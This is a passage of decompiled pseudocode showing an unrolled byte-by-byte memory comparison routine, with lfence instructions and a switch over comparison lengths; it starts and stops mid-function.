                                      					_t868 = (_t818[1] & 0x000000ff) - ( *_t678 & 0x000000ff);
                                      					__eflags = _t868;
                                      					if(_t868 == 0) {
                                      						_t813 = _t818[2] & 0x000000ff;
                                      						_t680 =  &(_t936[2]); // 0x850cc483
                                      						_t693 =  *_t680 & 0x000000ff;
                                      						goto L348;
                                      					}
                                      					goto L353;
                                      				}
                                      				_t871 = _a8;
                                      				if(_t699 == 1) {
                                      					_t819 = _a4;
                                      					_t938 = ( *_t819 & 0x000000ff) - ( *_t871 & 0x000000ff);
                                      					__eflags = _t938;
                                      					if(_t938 != 0) {
                                      						L345:
                                      						_t816 = 0;
                                      						__eflags = _t938;
                                      						goto L346;
                                      					}
                                      					_t662 =  &(_t871[1]); // 0xcc483c9
                                      					_t938 = (_t819[1] & 0x000000ff) - ( *_t662 & 0x000000ff);
                                      					__eflags = _t938;
                                      					if(_t938 != 0) {
                                      						goto L345;
                                      					}
                                      					_t664 =  &(_t871[2]); // 0x850cc483
                                      					_t938 = (_t819[2] & 0x000000ff) - ( *_t664 & 0x000000ff);
                                      					__eflags = _t938;
                                      					if(_t938 == 0) {
                                      						_t813 = _t819[3] & 0x000000ff;
                                      						_t670 =  &(_t871[3]); // 0xc0850cc4
                                      						_t693 =  *_t670 & 0x000000ff;
                                      						goto L348;
                                      					}
                                      					goto L345;
                                      				}
                                      				_t941 = _a4;
                                      				if(_t812 < 0x20) {
                                      					L79:
                                      					_t942 =  &(_t941[_t812]);
                                      					_t872 =  &(_t871[_t812]);
                                      					if(_t812 > 0x1f) {
                                      						L144:
                                      						_t820 = 0;
                                      						L145:
                                      						return _t820;
                                      					}
                                      					switch( *((intOrPtr*)(_t812 * 4 +  &M00EA2A91))) {
                                      						case 0:
                                      							goto L144;
                                      						case 1:
                                      							L209:
                                      							asm("lfence");
                                      							__eax =  *(__edx - 1) & 0x000000ff;
                                      							__ecx =  *(__esi - 1) & 0x000000ff;
                                      							__ecx = ( *(__esi - 1) & 0x000000ff) - ( *(__edx - 1) & 0x000000ff);
                                      							__eflags = __ecx;
                                      							if(__ecx != 0) {
                                      								__eax = 0;
                                      								__eflags = __ecx;
                                      								__eax = 0 | __ecx > 0x00000000;
                                      								__ecx = (__ecx > 0) * 2 - 1;
                                      							}
                                      							goto L145;
                                      						case 2:
                                      							L274:
                                      							__eflags =  *(__esi - 2) -  *(__edx - 2);
                                      							if( *(__esi - 2) ==  *(__edx - 2)) {
                                      								goto L144;
                                      							}
                                      							goto L340;
                                      						case 3:
                                      							L339:
                                      							asm("lfence");
                                      							__edi =  *(__esi - 3) & 0x000000ff;
                                      							__eax =  *(__edx - 3) & 0x000000ff;
                                      							__edi = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L341:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								0 | __edi > 0x00000000 = (0 | __edi > 0x00000000) * 2 - 1;
                                      								goto L145;
                                      							}
                                      							L340:
                                      							asm("lfence");
                                      							__eax =  *(__edx - 2) & 0x000000ff;
                                      							__edi =  *(__esi - 2) & 0x000000ff;
                                      							__edi = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								goto L209;
                                      							}
                                      							goto L341;
                                      						case 4:
                                      							L135:
                                      							if( *(_t942 - 4) ==  *(_t872 - 4)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L143:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L144;
                                      							}
                                      							asm("lfence");
                                      							_t876 = ( *(_t942 - 4) & 0x000000ff) - ( *(_t872 - 4) & 0x000000ff);
                                      							if(_t876 != 0) {
                                      								L139:
                                      								_t820 = (0 | _t876 > 0x00000000) * 2 - 1;
                                      								goto L143;
                                      							}
                                      							asm("lfence");
                                      							_t876 = ( *(_t942 - 3) & 0x000000ff) - ( *(_t872 - 3) & 0x000000ff);
                                      							if(_t876 != 0) {
                                      								goto L139;
                                      							}
                                      							asm("lfence");
                                      							_t876 = ( *(_t942 - 2) & 0x000000ff) - ( *(_t872 - 2) & 0x000000ff);
                                      							if(_t876 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 1) & 0x000000ff) - ( *(_t872 - 1) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L143;
                                      							}
                                      							goto L139;
                                      						case 5:
                                      							L200:
                                      							__eax =  *(__esi - 5);
                                      							__eflags =  *(__esi - 5) -  *(__edx - 5);
                                      							if( *(__esi - 5) ==  *(__edx - 5)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L208:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L209;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 5) & 0x000000ff;
                                      							__eax =  *(__edx - 5) & 0x000000ff;
                                      							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L204:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L208;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 4) & 0x000000ff;
                                      							__eax =  *(__edx - 4) & 0x000000ff;
                                      							__edi = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L204;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 3) & 0x000000ff;
                                      							__eax =  *(__edx - 3) & 0x000000ff;
                                      							__edi = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 2) & 0x000000ff;
                                      								__eax =  *(__edx - 2) & 0x000000ff;
                                      								__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L208;
                                      							}
                                      							goto L204;
                                      						case 6:
                                      							L265:
                                      							__eax =  *(__esi - 6);
                                      							__eflags =  *(__esi - 6) -  *(__edx - 6);
                                      							if( *(__esi - 6) ==  *(__edx - 6)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L273:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L274;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 6) & 0x000000ff;
                                      							__eax =  *(__edx - 6) & 0x000000ff;
                                      							__edi = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L269:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L273;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 5) & 0x000000ff;
                                      							__eax =  *(__edx - 5) & 0x000000ff;
                                      							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L269;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 4) & 0x000000ff;
                                      							__eax =  *(__edx - 4) & 0x000000ff;
                                      							__edi = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 3) & 0x000000ff;
                                      								__eax =  *(__edx - 3) & 0x000000ff;
                                      								__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L273;
                                      							}
                                      							goto L269;
                                      						case 7:
                                      							L330:
                                      							__eax =  *(__esi - 7);
                                      							__eflags =  *(__esi - 7) -  *(__edx - 7);
                                      							if( *(__esi - 7) ==  *(__edx - 7)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L338:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L339;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 7) & 0x000000ff;
                                      							__eax =  *(__edx - 7) & 0x000000ff;
                                      							__edi = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L334:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L338;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 6) & 0x000000ff;
                                      							__eax =  *(__edx - 6) & 0x000000ff;
                                      							__edi = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L334;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 5) & 0x000000ff;
                                      							__eax =  *(__edx - 5) & 0x000000ff;
                                      							__edi = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 4) & 0x000000ff;
                                      								__eax =  *(__edx - 4) & 0x000000ff;
                                      								__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L338;
                                      							}
                                      							goto L334;
                                      						case 8:
                                      							L126:
                                      							if( *(_t942 - 8) ==  *(_t872 - 8)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L134:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L135;
                                      							}
                                      							asm("lfence");
                                      							_t880 = ( *(_t942 - 8) & 0x000000ff) - ( *(_t872 - 8) & 0x000000ff);
                                      							if(_t880 != 0) {
                                      								L130:
                                      								_t820 = (0 | _t880 > 0x00000000) * 2 - 1;
                                      								goto L134;
                                      							}
                                      							asm("lfence");
                                      							_t880 = ( *(_t942 - 7) & 0x000000ff) - ( *(_t872 - 7) & 0x000000ff);
                                      							if(_t880 != 0) {
                                      								goto L130;
                                      							}
                                      							asm("lfence");
                                      							_t880 = ( *(_t942 - 6) & 0x000000ff) - ( *(_t872 - 6) & 0x000000ff);
                                      							if(_t880 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 5) & 0x000000ff) - ( *(_t872 - 5) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L134;
                                      							}
                                      							goto L130;
                                      						case 9:
                                      							L191:
                                      							__eax =  *(__esi - 9);
                                      							__eflags =  *(__esi - 9) -  *(__edx - 9);
                                      							if( *(__esi - 9) ==  *(__edx - 9)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L199:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L200;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 9) & 0x000000ff;
                                      							__edi =  *(__esi - 9) & 0x000000ff;
                                      							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L195:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L199;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 8) & 0x000000ff;
                                      							__eax =  *(__edx - 8) & 0x000000ff;
                                      							__edi = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L195;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 7) & 0x000000ff;
                                      							__eax =  *(__edx - 7) & 0x000000ff;
                                      							__edi = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 6) & 0x000000ff;
                                      								__eax =  *(__edx - 6) & 0x000000ff;
                                      								__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L199;
                                      							}
                                      							goto L195;
                                      						case 0xa:
                                      							L256:
                                      							__eax =  *(__esi - 0xa);
                                      							__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
                                      							if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L264:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L265;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 0xa) & 0x000000ff;
                                      							__edi =  *(__esi - 0xa) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L260:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L264;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 9) & 0x000000ff;
                                      							__edi =  *(__esi - 9) & 0x000000ff;
                                      							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L260;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 8) & 0x000000ff;
                                      							__edi =  *(__esi - 8) & 0x000000ff;
                                      							__edi = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__eax =  *(__edx - 7) & 0x000000ff;
                                      								__ecx =  *(__esi - 7) & 0x000000ff;
                                      								__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L264;
                                      							}
                                      							goto L260;
                                      						case 0xb:
                                      							L321:
                                      							__eax =  *(__esi - 0xb);
                                      							__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
                                      							if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L329:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L330;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xb) & 0x000000ff;
                                      							__eax =  *(__edx - 0xb) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L325:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L329;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xa) & 0x000000ff;
                                      							__eax =  *(__edx - 0xa) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L325;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 9) & 0x000000ff;
                                      							__eax =  *(__edx - 9) & 0x000000ff;
                                      							__edi = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 8) & 0x000000ff;
                                      								__eax =  *(__edx - 8) & 0x000000ff;
                                      								__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L329;
                                      							}
                                      							goto L325;
                                      						case 0xc:
                                      							L117:
                                      							if( *(_t942 - 0xc) ==  *(_t872 - 0xc)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L125:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L126;
                                      							}
                                      							asm("lfence");
                                      							_t884 = ( *(_t942 - 0xc) & 0x000000ff) - ( *(_t872 - 0xc) & 0x000000ff);
                                      							if(_t884 != 0) {
                                      								L121:
                                      								_t820 = (0 | _t884 > 0x00000000) * 2 - 1;
                                      								goto L125;
                                      							}
                                      							asm("lfence");
                                      							_t884 = ( *(_t942 - 0xb) & 0x000000ff) - ( *(_t872 - 0xb) & 0x000000ff);
                                      							if(_t884 != 0) {
                                      								goto L121;
                                      							}
                                      							asm("lfence");
                                      							_t884 = ( *(_t942 - 0xa) & 0x000000ff) - ( *(_t872 - 0xa) & 0x000000ff);
                                      							if(_t884 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 9) & 0x000000ff) - ( *(_t872 - 9) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L125;
                                      							}
                                      							goto L121;
                                      						case 0xd:
                                      							L182:
                                      							__eax =  *(__esi - 0xd);
                                      							__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
                                      							if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L190:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L191;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xd) & 0x000000ff;
                                      							__eax =  *(__edx - 0xd) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L186:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L190;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xc) & 0x000000ff;
                                      							__eax =  *(__edx - 0xc) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L186;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xb) & 0x000000ff;
                                      							__eax =  *(__edx - 0xb) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0xa) & 0x000000ff;
                                      								__eax =  *(__edx - 0xa) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L190;
                                      							}
                                      							goto L186;
                                      						case 0xe:
                                      							L247:
                                      							__eax =  *(__esi - 0xe);
                                      							__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
                                      							if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L255:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L256;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xe) & 0x000000ff;
                                      							__eax =  *(__edx - 0xe) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L251:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L255;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xd) & 0x000000ff;
                                      							__eax =  *(__edx - 0xd) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L251;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xc) & 0x000000ff;
                                      							__eax =  *(__edx - 0xc) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0xb) & 0x000000ff;
                                      								__eax =  *(__edx - 0xb) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L255;
                                      							}
                                      							goto L251;
                                      						case 0xf:
                                      							L312:
                                      							__eax =  *(__esi - 0xf);
                                      							__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
                                      							if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L320:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L321;
                                      							}
                                      							asm("lfence");
                                      							__eax =  *(__edx - 0xf) & 0x000000ff;
                                      							__edi =  *(__esi - 0xf) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L316:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L320;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xe) & 0x000000ff;
                                      							__eax =  *(__edx - 0xe) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L316;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xd) & 0x000000ff;
                                      							__eax =  *(__edx - 0xd) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0xc) & 0x000000ff;
                                      								__eax =  *(__edx - 0xc) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L320;
                                      							}
                                      							goto L316;
                                      						case 0x10:
                                      							L108:
                                      							if( *(_t942 - 0x10) ==  *(_t872 - 0x10)) {
                                      								_t820 = 0;
                                      								__eflags = 0;
                                      								L116:
                                      								if(_t820 != 0) {
                                      									goto L145;
                                      								}
                                      								goto L117;
                                      							}
                                      							asm("lfence");
                                      							_t888 = ( *(_t942 - 0x10) & 0x000000ff) - ( *(_t872 - 0x10) & 0x000000ff);
                                      							if(_t888 != 0) {
                                      								L112:
                                      								_t820 = (0 | _t888 > 0x00000000) * 2 - 1;
                                      								goto L116;
                                      							}
                                      							asm("lfence");
                                      							_t888 = ( *(_t942 - 0xf) & 0x000000ff) - ( *(_t872 - 0xf) & 0x000000ff);
                                      							if(_t888 != 0) {
                                      								goto L112;
                                      							}
                                      							asm("lfence");
                                      							_t888 = ( *(_t942 - 0xe) & 0x000000ff) - ( *(_t872 - 0xe) & 0x000000ff);
                                      							if(_t888 == 0) {
                                      								asm("lfence");
                                      								_t820 = ( *(_t942 - 0xd) & 0x000000ff) - ( *(_t872 - 0xd) & 0x000000ff);
                                      								__eflags = _t820;
                                      								if(_t820 != 0) {
                                      									__eflags = _t820;
                                      									_t820 = (0 | _t820 > 0x00000000) * 2 - 1;
                                      								}
                                      								goto L116;
                                      							}
                                      							goto L112;
                                      						case 0x11:
                                      							L173:
                                      							__eax =  *(__esi - 0x11);
                                      							__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
                                      							if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L181:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L182;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x11) & 0x000000ff;
                                      							__eax =  *(__edx - 0x11) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L177:
                                      								__ecx = 0;
                                      								__eflags = __edi;
                                      								__ecx = 0 | __edi > 0x00000000;
                                      								__ecx = (__edi > 0) * 2 - 1;
                                      								goto L181;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x10) & 0x000000ff;
                                      							__eax =  *(__edx - 0x10) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								goto L177;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0xf) & 0x000000ff;
                                      							__eax =  *(__edx - 0xf) & 0x000000ff;
                                      							__edi = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi == 0) {
                                      								asm("lfence");
                                      								__ecx =  *(__esi - 0xe) & 0x000000ff;
                                      								__eax =  *(__edx - 0xe) & 0x000000ff;
                                      								__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									__eax = 0;
                                      									__eflags = __ecx;
                                      									__eax = 0 | __ecx > 0x00000000;
                                      									__ecx = (__ecx > 0) * 2 - 1;
                                      								}
                                      								goto L181;
                                      							}
                                      							goto L177;
                                      						case 0x12:
                                      							L238:
                                      							__eax =  *(__esi - 0x12);
                                      							__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
                                      							if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
                                      								__ecx = 0;
                                      								__eflags = 0;
                                      								L246:
                                      								__eflags = __ecx;
                                      								if(__ecx != 0) {
                                      									goto L145;
                                      								}
                                      								goto L247;
                                      							}
                                      							asm("lfence");
                                      							__edi =  *(__esi - 0x12) & 0x000000ff;
                                      							__eax =  *(__edx - 0x12) & 0x000000ff;
                                      							__edi = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
                                      							__eflags = __edi;
                                      							if(__edi != 0) {
                                      								L242:
                                      								__ecx = 0;
                                      								__eflags = __edi;
